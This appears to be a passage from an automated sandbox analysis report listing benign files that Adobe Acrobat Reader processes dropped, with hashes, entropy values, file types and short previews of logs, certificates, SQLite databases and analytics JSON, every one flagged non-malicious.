                                                    SHA1:59CFC69FCCACEAB678FD647850DBC1F8A1208145
                                                    SHA-256:F77E411A16BD78B7468AE70C8D6691184C28F74DAFEB2D386961F23A3A356074
                                                    SHA-512:5783093E417D7E1C5A6C99E087B6268947959D473D07D4F87551C4324A843D891AEB4D2EBDA86EC3E325A322582A7A7E1D827834F5DA2C604EF9406EA6232A92
                                                    Malicious:false
                                                    Preview:2025/01/14-22:45:37.662 1f18 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2025/01/14-22:45:37.664 1f18 Recovering log #3.2025/01/14-22:45:37.665 1f18 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .
                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                    File Type:ASCII text
                                                    Category:dropped
                                                    Size (bytes):324
                                                    Entropy (8bit):5.253858478870673
                                                    Encrypted:false
                                                    SSDEEP:6:iO83VXL+q2Pwkn2nKuAl9OmbzNMxIFUtW3V/T1Zmwo3VtIdjLVkwOwkn2nKuAl9c:7KVXyvYfHAa8jFUt4V/5/GVSdjR5JfHP
                                                    MD5:19C4CC67AD21FECF906C37BAA3E02E63
                                                    SHA1:59CFC69FCCACEAB678FD647850DBC1F8A1208145
                                                    SHA-256:F77E411A16BD78B7468AE70C8D6691184C28F74DAFEB2D386961F23A3A356074
                                                    SHA-512:5783093E417D7E1C5A6C99E087B6268947959D473D07D4F87551C4324A843D891AEB4D2EBDA86EC3E325A322582A7A7E1D827834F5DA2C604EF9406EA6232A92
                                                    Malicious:false
                                                    Preview:2025/01/14-22:45:37.662 1f18 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2025/01/14-22:45:37.664 1f18 Recovering log #3.2025/01/14-22:45:37.665 1f18 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .
                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                    File Type:PC bitmap, Windows 3.x format, 117 x -152 x 32, cbSize 71190, bits offset 54
                                                    Category:dropped
                                                    Size (bytes):71190
                                                    Entropy (8bit):0.9434962480212884
                                                    Encrypted:false
                                                    SSDEEP:48:nK+R34h98xFM9Zcdt6f7NGM9MYtG3AFBQppppppppppppppppppppppppppppppQ:U98zM9OdOJGM9MY8AFmNMMWGM9ycZn
                                                    MD5:0B65B25FCDFFEFD4EA8B98C7628BEC90
                                                    SHA1:6C69854487CBF65F31B08BF38F4E144BA949D045
                                                    SHA-256:816C80A163661DAB0538CE968DBB412F1118CADF361762858BB2FF5AAEA50481
                                                    SHA-512:4B8CA3C8E5E2477D23DFA8CFD86C061D1A639B79436F8967803D3869C614CEB0ED3826CA9CFC3731B3E8E2CACCAA3312ED38A1D5B68A5F95E2E5137605508622
                                                    Malicious:false
                                                    Preview:BM........6...(...u...h..... .................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................z...
                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 15, database pages 21, cookie 0x5, schema 4, UTF-8, version-valid-for 15
                                                    Category:dropped
                                                    Size (bytes):86016
                                                    Entropy (8bit):4.445251049092317
                                                    Encrypted:false
                                                    SSDEEP:384:yezci5t4iBA7aDQPsknQ0UNCFOa14ocOUw6zyFzqFkdZ+EUTTcdUZ5yDQhJL:rfs3OazzU89UTTgUL
                                                    MD5:E5F7AE9604AD802146C9EA276F31D341
                                                    SHA1:73FD7FA812CD86669A48DF9B188B7942004072F6
                                                    SHA-256:CA2E42D6D31604C91C7B87D9F6B74F89DBE8101B6AF6BE6F09EFF980494FE1A1
                                                    SHA-512:17C6CA88A70F42ECB888E8170F35436ABB700940A29A6B899907844EFB771825F81E3717B00570D3D9B4284D8688C85A063A59D1C8D1D3F9A9B63A58CE399D23
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ ..........................................................................c.......1........T...U.1.D............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                    File Type:SQLite Rollback Journal
                                                    Category:dropped
                                                    Size (bytes):8720
                                                    Entropy (8bit):3.7775637056845643
                                                    Encrypted:false
                                                    SSDEEP:48:7Mwp/E2ioyVo9ioy9oWoy1Cwoy1pmKOioy1noy1AYoy1Wioy1hioybioyzCoy1nT:7Tpjuo9F6eXKQsAQnb9IVXEBodRBks
                                                    MD5:10BE2CFB8B78DF0F23E36ED55616F63B
                                                    SHA1:F69972AF1BE601C18BE28E796B24287CF32506E2
                                                    SHA-256:745C062DA8A1BF39A61BC5D9E40D7CA45F9C55FB7744476B27734FE3C0BF87B4
                                                    SHA-512:0EA30D7F9A8852DA906616BB788F8E2378BBFD4BADD7F2F01820091E05F6C787F65CA0F0832BE44600E085933B83DD8D6546B29AA68FB4AE9E3031F197ADDE81
                                                    Malicious:false
                                                    Preview:.... .c.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................T...[...b...r...t...}.....L..............................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                    File Type:Certificate, Version=3
                                                    Category:dropped
                                                    Size (bytes):1391
                                                    Entropy (8bit):7.705940075877404
                                                    Encrypted:false
                                                    SSDEEP:24:ooVdTH2NMU+I3E0Ulcrgdaf3sWrATrnkC4EmCUkmGMkfQo1fSZotWzD1:ooVguI3Kcx8WIzNeCUkJMmSuMX1
                                                    MD5:0CD2F9E0DA1773E9ED864DA5E370E74E
                                                    SHA1:CABD2A79A1076A31F21D253635CB039D4329A5E8
                                                    SHA-256:96BCEC06264976F37460779ACF28C5A7CFE8A3C0AAE11A8FFCEE05C0BDDF08C6
                                                    SHA-512:3B40F27E828323F5B91F8909883A78A21C86551761F27B38029FAAEC14AF5B7AA96FB9F9CC93EE201B5EB1D0FEF17B290747E8B839D2E49A8F36C5EBF3C7C910
                                                    Malicious:false
                                                    Preview:0..k0..S............@.YDc.c...0...*.H........0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10...150604110438Z..350604110438Z0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10.."0...*.H.............0..........$s..7.+W(.....8..n<.W.x.u...jn..O(..h.lD...c...k....1.!~.3<.H..y.....!.K...qiJffl.~<p..)"......K...~....G.|.H#S.8.O.o...IW..t../.8.{.p!.u.0<.....c...O..K~.....w...{J.L.%.p..)..S$........J.?..aQ.....cq...o[...\4ylv.;.by.../&.....................6....7..6u...r......I.....*.A..v........5/(.l....dwnG7..Y^h..r...A)>Y>.&.$...Z.L@.F....:Qn.;.}r...xY.>Qx....../..>{J.Ks......P.|C.t..t.....0.[q6....00\H..;..}`...).........A.......|.;F.H*..v.v..j.=...8.d..+..(.....B.".'].y...p..N..:..'Qn..d.3CO......B0@0...U...........0...U.......0....0...U......y.Y.{....s.....X..n0...*.H.............U.X....P.....i ')..au\.n...i/..VK..s.Y.!.~.Lq...`.9....!V..P.Y...Y.............b.E.f..|o..;.....'...}~.."......
                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                    File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                                    Category:dropped
                                                    Size (bytes):71954
                                                    Entropy (8bit):7.996617769952133
                                                    Encrypted:true
                                                    SSDEEP:1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
                                                    MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
                                                    SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
                                                    SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
                                                    SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
                                                    Malicious:false
                                                    Preview:MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..*Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=*....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.|.c.&>?..^t. ..;..X.d.E.0G....[Q.*,*......#.Dp..L.o|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...
                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):192
                                                    Entropy (8bit):2.7425532007658724
                                                    Encrypted:false
                                                    SSDEEP:3:kkFkl/Rju+k31fllXlE/HT8kwJ1NNX8RolJuRdxLlGB9lQRYwpDdt:kKv+kmT8V7NMa8RdWBwRd
                                                    MD5:67CC7B7E869FA30E39B9ED7A50C44D5C
                                                    SHA1:61A8FBF149D40735E57BE7722B50CFDE69E17C37
                                                    SHA-256:C269E46F7D6E529F1FAA5557F80FD012CA8EBC705959ED76DAE3B21334805053
                                                    SHA-512:164DFE58E1747EABCDFAFD6AA5AB6331874011C2AA0D83786A26AAED8400CC87DA307A9FD6C585615B04C24F75FD33877FEB568A3A926ED422FCE0ECA85723C1
                                                    Malicious:false
                                                    Preview:p...... ........Lt...f..(....................................................... ..........W....%...............o...h.t.t.p.:././.x.1...i...l.e.n.c.r...o.r.g./...".6.4.c.d.6.6.5.4.-.5.6.f."...
                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                    File Type:data
                                                    Category:modified
                                                    Size (bytes):328
                                                    Entropy (8bit):3.2181539600449063
                                                    Encrypted:false
                                                    SSDEEP:6:kK449UswD8HGsL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:gDDImsLNkPlE99SNxAhUe/3
                                                    MD5:27816EE3626C6064CDBE4CF0EB647490
                                                    SHA1:E9AD370577F581F387DC3A8B0C304A9420A05D35
                                                    SHA-256:911917558CFEDA06A357A268BCFE7F200729F3FA64AEE96385F4B56EB488373F
                                                    SHA-512:D7BC6CE781DF993808B23656B182ECCDF7F82BB4F80E3F22ECA04ED5AC7CC2C33D11837E5C28E3A90EA69E13C8CADC37BE7152AE3D2F29241FE79C76A16B3073
                                                    Malicious:false
                                                    Preview:p...... .........C:..g..(....................................................... ........G..@.......&......X........h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...
                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):243196
                                                    Entropy (8bit):3.3450692389394283
                                                    Encrypted:false
                                                    SSDEEP:1536:vKPCPiyzDtrh1cK3XEivK7VK/3AYvYwgqErRo+RQn:yPClJ/3AYvYwghFo+RQn
                                                    MD5:F5567C4FF4AB049B696D3BE0DD72A793
                                                    SHA1:EBEADDE9FF0AF2C201A5F7CC747C9EA61CFA6916
                                                    SHA-256:D8DBFE71873929825A420F73821F3FF0254D51984FAAA82E1B89D31188F77C04
                                                    SHA-512:E769735991E5B1331E259608854D00CDA4F3E92285FDC500158CBD09CBCCEAD8A387F78256A43919B13EBE70C995D19242377C315B0CCBBD4F813251608C1D56
                                                    Malicious:false
                                                    Preview:Adobe Acrobat Reader (64-bit) 23.6.20320....?A12_AV2_Search_18px.............................................................................................................KKK KKK.KKK.KKK.KKK.KKK.KKK@........................................KKK`KKK.KKK.KKK.KKK.KKK.KKK.KKK.KKK.KKK.............................KKKPKKK.KKK.KKK.KKK.........KKKPKKK.KKK.KKK.........................KKK.KKK.KKK.KKK0....................KKK.KKK.KKK.KKK`....................KKK`KKK.KKK.............................KKK@KKK.KKK.....................KKK.KKK.KKK0................................KKK.KKK.....................KKK.KKK.....................................KKK.KKK.....................KKK.KKK.KKK0................................KKK.KKK.....................KKK`KKK.KKK.............................KKK@KKK.KKK.....................KKK.KKK.KKK.KKK@....................KKK.KKK.KKK.KKK`........................KKKPKKK.KKK.KKK.KKK.........KKKPKKK.KKK.KKK.KKK.............................KKK`KKK.KKK.KKK.KKK.KKK.KKK.KKK.KKK.KKK
                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                    File Type:JSON data
                                                    Category:dropped
                                                    Size (bytes):295
                                                    Entropy (8bit):5.344188704136046
                                                    Encrypted:false
                                                    SSDEEP:6:YEQXJ2HXfbI4XC7HdVoZcg1vRcR0YlXZeoAvJM3g98kUwPeUkwRe9:YvXKXfbI4SDkZc0v6zGMbLUkee9
                                                    MD5:5D55199F99C701E94FF503C1A4EF1C40
                                                    SHA1:04AC3B5D303AB167A4C9481AF4237E10FD2EEB73
                                                    SHA-256:639D2BF61060EBEBD16ECC2FED0A52B718E507456A65AA75DED9767FDE4422D8
                                                    SHA-512:C001D6E61B9E36B7E68A1CCEB6329AB928EEA9B1135D424DF2ED482175FA117E6A33E0A9CBBB02E50611AC9CCFD70ABF7DF908134B7B9D4C28C41A41F32FD14E
                                                    Malicious:false
                                                    Preview:{"analyticsData":{"responseGUID":"162c99ac-9e56-496c-8145-ad39ac4191b0","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1737091123144,"statusCode":200,"surfaceID":"ACROBAT_READER_MASTER_SURFACEID","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                    File Type:JSON data
                                                    Category:dropped
                                                    Size (bytes):294
                                                    Entropy (8bit):5.295142401082559
                                                    Encrypted:false
                                                    SSDEEP:6:YEQXJ2HXfbI4XC7HdVoZcg1vRcR0YlXZeoAvJfBoTfXpnrPeUkwRe9:YvXKXfbI4SDkZc0v6zGWTfXcUkee9
                                                    MD5:A0EBD0D0F75CCB661628AB497648BC65
                                                    SHA1:2760FA0D31425D891D4CC4F584CDF218F5D9D16B
                                                    SHA-256:F2433551B0CBBB3193664C304E31C093071BBA2324931DF8E7D3E406F72D5111
                                                    SHA-512:0FC0792BBEDB5D0B29F47F24A0CA03192209F5B5083C7E58FB6DCB2206696858590F33BD11BCE160DEAA8907E4EBA9A6822334B609EA452031DBA2DA2044A19B
                                                    Malicious:false
                                                    Preview:{"analyticsData":{"responseGUID":"162c99ac-9e56-496c-8145-ad39ac4191b0","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1737091123144,"statusCode":200,"surfaceID":"DC_FirstMile_Home_View_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                    File Type:JSON data
                                                    Category:dropped
                                                    Size (bytes):294
                                                    Entropy (8bit):5.2726146502861875
                                                    Encrypted:false
                                                    SSDEEP:6:YEQXJ2HXfbI4XC7HdVoZcg1vRcR0YlXZeoAvJfBD2G6UpnrPeUkwRe9:YvXKXfbI4SDkZc0v6zGR22cUkee9
                                                    MD5:CF26F5C5F0332D2F2D02830AB06E0651
                                                    SHA1:B07D864C9246AD387C820144D6F26669F40CE3B7
                                                    SHA-256:FE7414AF3844B2C2F7123BB646AA28FA77BB53C75C9BE212DCE2B5881CEC3CA8
                                                    SHA-512:C242F43CED9A2ECCA5B7E898B4646FDD3326DCA8D4AC81BC9A62A247478A8AB3BFC5DC45ABF5DC23EF68D5DD3889916E6C1C2B87DEFBA58C2F85F55A15128201
                                                    Malicious:false
                                                    Preview:{"analyticsData":{"responseGUID":"162c99ac-9e56-496c-8145-ad39ac4191b0","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1737091123144,"statusCode":200,"surfaceID":"DC_FirstMile_Right_Sec_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                    File Type:JSON data
                                                    Category:dropped
                                                    Size (bytes):285
                                                    Entropy (8bit):5.330526414465201
                                                    Encrypted:false
                                                    SSDEEP:6:YEQXJ2HXfbI4XC7HdVoZcg1vRcR0YlXZeoAvJfPmwrPeUkwRe9:YvXKXfbI4SDkZc0v6zGH56Ukee9
                                                    MD5:7EC5BCD301C38914D9E2789A07B382E9
                                                    SHA1:35A451D815B19B8F129EBBA271AD9AA5CEFDC188
                                                    SHA-256:DCA174C68305F9A65E4A597EDD4130742035B13E9CBDEC723BFD761BBDF2A46E
                                                    SHA-512:8C34566F1C7B9710D57B7FCC60E814289B71FF347A666F66789295D32AFA61DDBDBC121276E6978404862925C68D8911E8E7AC2A194FD34040793593AD685E7C
                                                    Malicious:false
                                                    Preview:{"analyticsData":{"responseGUID":"162c99ac-9e56-496c-8145-ad39ac4191b0","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1737091123144,"statusCode":200,"surfaceID":"DC_READER_LAUNCH_CARD","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                    File Type:JSON data
                                                    Category:dropped
                                                    Size (bytes):1123
                                                    Entropy (8bit):5.683455292741471
                                                    Encrypted:false
                                                    SSDEEP:24:Yv6XU4SDkzv6opLgE9cQx8LennAvzBvkn0RCmK8czOCCSH:YvoSDsXhgy6SAFv5Ah8cv/H
                                                    MD5:1AA29D083EBD14AB5AB7F35990BEC20D
                                                    SHA1:C32C019538D645172AE5D33B78DBFB6887730419
                                                    SHA-256:003AA4D563F7A238BB90DF53597FEEA0E101D21A4BD554A8A5A691E22B7CA38A
                                                    SHA-512:4247C7D2CE02FD4ECC4C7E6F3835D5F7F97338DB94984A4641F396D5F5A88BF12F07F54BAC2D7A7D151AA582D6912FB7C94A38BDC148CB0A80ED8E5F9DDD2E43
                                                    Malicious:false
                                                    Preview:{"analyticsData":{"responseGUID":"162c99ac-9e56-496c-8145-ad39ac4191b0","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1737091123144,"statusCode":200,"surfaceID":"DC_Reader_Convert_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Convert_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_1","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"d5bba1ae-6009-4d23-8886-fd4a474b8ac9","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Convert_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IkNvbnZlcnRQREZSZHJSSFBBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkV4cG9ydCBQREZzIHRvIE1pY3Jvc29mdCBXb3JkIGFuZCBFeGNlbC4ifSwidGNh
                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                    File Type:JSON data
                                                    Category:dropped
                                                    Size (bytes):289
                                                    Entropy (8bit):5.27733501151744
                                                    Encrypted:false
                                                    SSDEEP:6:YEQXJ2HXfbI4XC7HdVoZcg1vRcR0YlXZeoAvJf8dPeUkwRe9:YvXKXfbI4SDkZc0v6zGU8Ukee9
                                                    MD5:98B4C013007A2248FFE0175A9A94EBA4
                                                    SHA1:EB66B16554BD7C245669FBD6718C795F5A53C0C4
                                                    SHA-256:A9B1EE80B2BD3DF2D0E7293491DC12CDD9359676D82AE18DBB14C6DC0F48DE7C
                                                    SHA-512:6915489A71BB526E1B0C395E63361E0FF0F99429AAB7968956171B2E1F44867A94A303FCFF1E6DD7AF0609ABD72AF2AB0E649C1E3E8AB0AA37A51F687D16BBB6
                                                    Malicious:false
                                                    Preview:{"analyticsData":{"responseGUID":"162c99ac-9e56-496c-8145-ad39ac4191b0","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1737091123144,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                    File Type:JSON data
                                                    Category:dropped
                                                    Size (bytes):292
                                                    Entropy (8bit):5.282050105403242
                                                    Encrypted:false
                                                    SSDEEP:6:YEQXJ2HXfbI4XC7HdVoZcg1vRcR0YlXZeoAvJfQ1rPeUkwRe9:YvXKXfbI4SDkZc0v6zGY16Ukee9
                                                    MD5:48E7449ABC07F3AB74F6E47A9EB8C1D0
                                                    SHA1:499729C588B2E5D2ACA9359C29B481103022BB0B
                                                    SHA-256:B47686959632E842F0E6C37BCEE81B152AC4BF1929123BC2BF9AC943F88BD187
                                                    SHA-512:EF0FAB1119053F785D64B8D8E29495C09C1FBCD3E0FBD53D1D468F42A1B5790A3ACF75230052F862C1C8C0491874E724C6E67F812FDCDECAC81DB94364B69C1F
                                                    Malicious:false
                                                    Preview:{"analyticsData":{"responseGUID":"162c99ac-9e56-496c-8145-ad39ac4191b0","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1737091123144,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                    File Type:JSON data
                                                    Category:dropped
                                                    Size (bytes):289
                                                    Entropy (8bit):5.288514197742661
                                                    Encrypted:false
                                                    SSDEEP:6:YEQXJ2HXfbI4XC7HdVoZcg1vRcR0YlXZeoAvJfFldPeUkwRe9:YvXKXfbI4SDkZc0v6zGz8Ukee9
                                                    MD5:B4EEDBD89298741A76A1727E221827B9
                                                    SHA1:D647B1D587E8C8FDC15861F921AE9A835FF59CB8
                                                    SHA-256:E253E0052CA39ACD14B434F5B70CACCA83E0BA64B54E974800C1882734B45A99
                                                    SHA-512:A07F0629DF56FF50D79CAAC5A29A928B38EC45DDB425969A38A26702AF794E9B1D2B62804B881B8AF01EB6132E0B57A692F5EC69A3086E2690CAEEC8DCC2B78C
                                                    Malicious:false
                                                    Preview:{"analyticsData":{"responseGUID":"162c99ac-9e56-496c-8145-ad39ac4191b0","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1737091123144,"statusCode":200,"surfaceID":"DC_Reader_Edit_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                    File Type:JSON data
                                                    Category:dropped
                                                    Size (bytes):295
                                                    Entropy (8bit):5.304184362897416
                                                    Encrypted:false
                                                    SSDEEP:6:YEQXJ2HXfbI4XC7HdVoZcg1vRcR0YlXZeoAvJfzdPeUkwRe9:YvXKXfbI4SDkZc0v6zGb8Ukee9
                                                    MD5:E27EF90BA1209A97AC1B7FBE1BAC06DC
                                                    SHA1:DEC1A60D67A9EC12312DC0CDEEE4AD43168C9D39
                                                    SHA-256:B0CB3CC664506B9A95E1272F834993A6A076BC0C9229C16304EE5E8696DDE878
                                                    SHA-512:F71EAB540C326246DE7B57489BDECAF9652A7D546474406A72607F1BD812BDCBCD99F225E6B4B4C1ED0D4B85B06B76CB21E3C732EA7C617B1BB2B08DD5CD06DE
                                                    Malicious:false
                                                    Preview:{"analyticsData":{"responseGUID":"162c99ac-9e56-496c-8145-ad39ac4191b0","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1737091123144,"statusCode":200,"surfaceID":"DC_Reader_Home_LHP_Trial_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                    File Type:JSON data
                                                    Category:dropped
                                                    Size (bytes):289
                                                    Entropy (8bit):5.284790442891288
                                                    Encrypted:false
                                                    SSDEEP:6:YEQXJ2HXfbI4XC7HdVoZcg1vRcR0YlXZeoAvJfYdPeUkwRe9:YvXKXfbI4SDkZc0v6zGg8Ukee9
                                                    MD5:555197FAEAB718ECCF41AEF28672618C
                                                    SHA1:0DDDCE76E0C52C5CAA83C2046C428052D56AA66F
                                                    SHA-256:41229E73E03A1085C85B89DD8DC79492754D308223AC60FE6D958C5EF5098526
                                                    SHA-512:1516AB15616E4848976A5CFAA9332E2B926F8EBF8D6A1A98609E06B76C6D01DB39A46521B9A4C9AF780C52D8BD86FF92025320982532D43FCA9EBCF3908B3EFD
                                                    Malicious:false
                                                    Preview:{"analyticsData":{"responseGUID":"162c99ac-9e56-496c-8145-ad39ac4191b0","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1737091123144,"statusCode":200,"surfaceID":"DC_Reader_More_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                    File Type:JSON data
                                                    Category:dropped
                                                    Size (bytes):284
                                                    Entropy (8bit):5.270573041821403
                                                    Encrypted:false
                                                    SSDEEP:6:YEQXJ2HXfbI4XC7HdVoZcg1vRcR0YlXZeoAvJf+dPeUkwRe9:YvXKXfbI4SDkZc0v6zG28Ukee9
                                                    MD5:D5777B640CE06635FE861FDBF952320F
                                                    SHA1:008D197F71AFF24AECD44067E76A1541D7558DE5
                                                    SHA-256:C1B0A588E14DE8F1A953F10CA7F133F5F2EC16973FE497C5D16757437DF7BA56
                                                    SHA-512:434C53FA7E762C40291C482E7559A415A6F39F3186FAC4835BAA2E4520C49EE4C11458CDBBCB6DB7ACEDDA491DC0F19097C4D18E576CED838651380EEC1BC29A
                                                    Malicious:false
                                                    Preview:{"analyticsData":{"responseGUID":"162c99ac-9e56-496c-8145-ad39ac4191b0","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1737091123144,"statusCode":200,"surfaceID":"DC_Reader_RHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                    File Type:JSON data
                                                    Category:dropped
                                                    Size (bytes):291
                                                    Entropy (8bit):5.2684420736037
                                                    Encrypted:false
                                                    SSDEEP:6:YEQXJ2HXfbI4XC7HdVoZcg1vRcR0YlXZeoAvJfbPtdPeUkwRe9:YvXKXfbI4SDkZc0v6zGDV8Ukee9
                                                    MD5:B4FD5E09598CC0EDE6ADE0F7076B0829
                                                    SHA1:D437D52FCC2AFA6E3DF08CE61B48DC33607EABB3
                                                    SHA-256:D2D900344C1130D2DD37FD11ACE1C4C6EA952AD4FE265271A84437733F0316D9
                                                    SHA-512:77BC933A491003D87FE073B202C20A9433B20904897804B234CF9892B15CD3248C28833BB095A32672F256481821444653C7168CC56730BA0249C3B32564BA5A
                                                    Malicious:false
                                                    Preview:{"analyticsData":{"responseGUID":"162c99ac-9e56-496c-8145-ad39ac4191b0","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1737091123144,"statusCode":200,"surfaceID":"DC_Reader_RHP_Intent_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                    File Type:JSON data
                                                    Category:dropped
                                                    Size (bytes):287
